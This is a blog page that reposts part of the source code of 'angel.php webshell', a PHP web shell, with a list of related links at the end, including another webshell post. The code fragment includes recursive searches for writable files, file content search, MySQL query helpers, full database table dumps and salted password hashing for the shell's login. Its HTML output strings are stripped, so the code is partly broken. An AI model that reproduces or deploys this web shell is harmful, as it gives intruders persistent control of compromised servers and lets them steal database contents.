'Y-m-d H:i:s', filemtime( $f ) ); $dirdata[ $j ]['dirchmod']= getChmod( $f ); $dirdata[ $j ]['dirperm'] = getPerms( $f ); $dirdata[ $j ]['dirlink'] = $dir; $dirdata[ $j ]['server_link'] = $f; $j ++; } GetWDirList( $f ); } } closedir( $dh ); clearstatcache(); return $dirdata; } else { return array(); } } function GetWFileList( $dir ) { global $filedata, $j, $nowpath, $writabledb; ! $j && $j = 1; if ( $dh = opendir( $dir ) ) { while ( $file = readdir( $dh ) ) { $ext = getext( $file ); $f = str_replace( '//', '/', $dir . '/' . $file ); if ( $file != '.' && $file != '..' && is_dir( $f ) ) { GetWFileList( $f ); } elseif ( $file != '.' && $file != '..' && is_file( $f ) && in_array( $ext, explode( ',', $writabledb ) ) ) { if ( is_writable( $f ) ) { $filedata[ $j ]['filename']= str_replace( $nowpath, '', $f ); $filedata[ $j ]['size']= sizecount( @filesize( $f ) ); $filedata[ $j ]['mtime'] = @date( 'Y-m-d H:i:s', filemtime( $f ) ); $filedata[ $j ]['filechmod'] = getChmod( $f ); $filedata[ $j ]['fileperm']= getPerms( $f ); $filedata[ $j ]['fileowner'] = getUser( $f ); $filedata[ $j ]['dirlink'] = $dir; $filedata[ $j ]['server_link'] = $f; $j ++; } } } closedir( $dh ); clearstatcache(); return $filedata; } else { return array(); } } function GetSFileList( $dir, $content, $re = 0 ) { global $filedata, $j, $nowpath, $writabledb; ! $j && $j = 1; if ( $dh = opendir( $dir ) ) { while ( $file = readdir( $dh ) ) { $ext = getext( $file ); $f = str_replace( '//', '/', $dir . '/' . $file ); if ( $file != '.' && $file != '..' && is_dir( $f ) ) { GetSFileList( $f, $content, $re = 0 ); } elseif ( $file != '.' && $file != '..' && is_file( $f ) && in_array( $ext, explode( ',', $writabledb ) ) ) { $find = 0; if ( $re ) { if ( preg_match( '@' . $content . '@', $file ) || preg_match( '@' . $content . '@', @file_get_contents( $f ) ) ) { $find = 1; } } else { if ( strstr( $file, $content ) || strstr( @file_get_contents( $f ), $content ) ) { $find = 1; } } if ( $find ) { $filedata[ $j ]['filename']= str_replace( $nowpath, '', $f ); $filedata[ $j ]['size']= sizecount( @filesize( $f ) ); $filedata[ $j ]['mtime'] = @date( 'Y-m-d H:i:s', filemtime( $f ) ); $filedata[ $j ]['filechmod'] = getChmod( $f ); $filedata[ $j ]['fileperm']= getPerms( $f ); $filedata[ $j ]['fileowner'] = getUser( $f ); $filedata[ $j ]['dirlink'] = $dir; $filedata[ $j ]['server_link'] = $f; $j ++; } } } closedir( $dh ); clearstatcache(); return $filedata; } else { return array(); } } function qy( $sql ) { global $mysqllink; //echo $sql.'
'; $res = $error = ''; if ( ! $res = @mysql_query( $sql, $mysqllink ) ) { return 0; } else if ( is_resource( $res ) ) { return 1; } else { return 2; } return 0; } function q( $sql ) { global $mysqllink; return @mysql_query( $sql, $mysqllink ); } function fr( $qy ) { mysql_free_result( $qy ); } function sizecount( $fileSize ) { $size = sprintf( "%u", $fileSize ); if ( $size == 0 ) { return '0 Bytes'; } $sizename = array( ' Bytes', ' KB', ' MB', ' GB', ' TB', ' PB', ' EB', ' ZB', ' YB' ); return round( $size / pow( 1024, ( $i = floor( log( $size, 1024 ) ) ) ), 2 ) . $sizename[ $i ]; } // 备份数据库 function sqldumptable( $table, $fp = 0 ) { global $mysqllink; $tabledump = "DROP TABLE IF EXISTS `$table`;\n"; $res = q( "SHOW CREATE TABLE $table" ); $create= mysql_fetch_row( $res ); $tabledump .= $create[1] . ";\n\n"; if ( $fp ) { fwrite( $fp, $tabledump ); } else { echo $tabledump; } $tabledump = ''; $rows= q( "SELECT * FROM $table" ); while ( $row = mysql_fetch_assoc( $rows ) ) { foreach ( $row as $k => $v ) { $row[ $k ] = "'" . @mysql_real_escape_string( $v ) . "'"; } $tabledump = 'INSERT INTO `' . $table . '` VALUES (' . implode( ", ", $row ) . ');' . "\n"; if ( $fp ) { fwrite( $fp, $tabledump ); } else { echo $tabledump; } } fwrite( $fp, "\n\n" ); fr( $rows ); } function p( $str ) { echo $str . "\n"; } function tbhead() { p( '
' : ''; $arg['class'] = $arg['class'] ? $arg['class'] : 'input'; if ( $arg['newline'] ) { p( "
$arg[title]
" ); } else { p( "$arg[title]" ); } } function makeselect( $arg = array() ) { if ( $arg['onchange'] ) { $onchange = 'onchange="' . $arg['onchange'] . '"'; } $arg['title'] = $arg['title'] ? $arg['title'] : ''; if ( $arg['newline'] ) { p( '' ); } p( "$arg[title] " ); if ( $arg['newline'] ) { p( '
' ); } } function formhead( $arg = array() ) { global $self; ! $arg['method'] && $arg['method'] = 'post'; ! $arg['action'] && $arg['action'] = $self; $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : ''; ! $arg['name'] && $arg['name'] = 'form1'; p( "' ); } function goback() { global $self, $nowpath; p( '' ); } function formfoot() { p( '' ); } function encode_pass( $pass ) { $pass = md5( 'angel' . $pass ); $pass = md5( $pass . 'angel' ); $pass = md5( 'angel' . $pass . 'angel' ); return $pass; } function pr( $s ) { echo "" . print_r( $s ) . '';//此处prre请手动换成pre } ?>
原文连接:angel.php webshell
所有媒体,可在保留署名、
原文连接的情况下转载,若非则不得使用我方内容。
- 2025 BT磁力搜索引擎大全【最新优质】
- 怎么用图片搜索番号?以图搜图AI搜图
- this channel is blocked because it was used:Telegram群组/频道屏蔽解决方法
- 最新ESET NOD32 License Key/激活码/许可证密钥/用户名密码
- 谷歌识图,以图搜图
- No Access-Control-Allow-Origin 跨域错误解决
- 7款常用《网络抓包工具》更新
- 手机BT/种子下载,手机磁力链下载软件整理
- 一个绕过Google谷歌验证码(reCAPTCHA)的方法
- 404.php webshell
- 网络安全“Cyber security”和“Network security”的区别
- 9部有史以来最好的黑客电影
- 用uBlock Origin过滤广告,享受最好的广告拦截体验
- 解决Play商店“从服务器检索信息时出错DF-DFERH-01”
- Searx – 尊重隐私的开源搜索引擎
扫码分享
验证:
体验盒子扫码分享
打赏零钱
